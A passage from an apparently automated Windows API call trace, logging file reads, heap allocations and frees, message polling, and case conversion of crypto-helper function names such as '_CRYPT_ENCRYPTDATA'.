lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0077.438] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0077.440] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x3946, lpOverlapped=0x0) returned 1 [0077.440] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0077.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0077.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0077.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0077.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13946) returned 0x48f0048 [0077.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0077.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0077.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0077.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0077.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13946) returned 0x4903998 [0077.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0077.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.444] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0077.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0077.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0077.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13946) returned 0x48f0048 [0077.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0077.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0077.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.445] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0077.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0077.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0077.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0077.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0077.445] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0077.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0077.445] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0077.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0077.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0077.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0077.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0077.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0077.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0077.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13946) returned 0x48f0048 [0077.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0077.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2530 [0077.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0077.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0077.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0077.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0077.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0077.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0077.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3e8 [0077.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0077.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0077.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0077.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13946) returned 0x49172e8 [0077.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0077.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0077.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0077.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0077.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0077.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0077.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0077.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0077.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0077.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0077.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0077.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0077.447] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0077.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0077.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0077.448] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0077.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0077.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0077.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0077.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0077.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0077.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0077.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0077.448] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0077.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0077.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2670 [0077.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0077.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0077.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0077.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0077.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0077.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0077.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0077.449] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0077.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0077.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0077.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0077.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0077.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0077.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0077.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0077.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0077.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.449] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0077.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0077.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0077.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0077.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0077.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0077.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0077.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0077.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.450] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0077.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0077.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0077.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0077.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0077.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0077.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0077.451] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0077.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6a0 [0077.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0077.451] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0077.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0077.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0077.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0077.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0077.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0077.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0077.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0077.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0077.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0077.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0077.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0077.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0077.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0077.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0077.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0077.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0077.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0077.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0077.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0077.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0077.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0077.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0077.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0077.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0077.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0077.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0077.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0077.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0077.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0077.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: 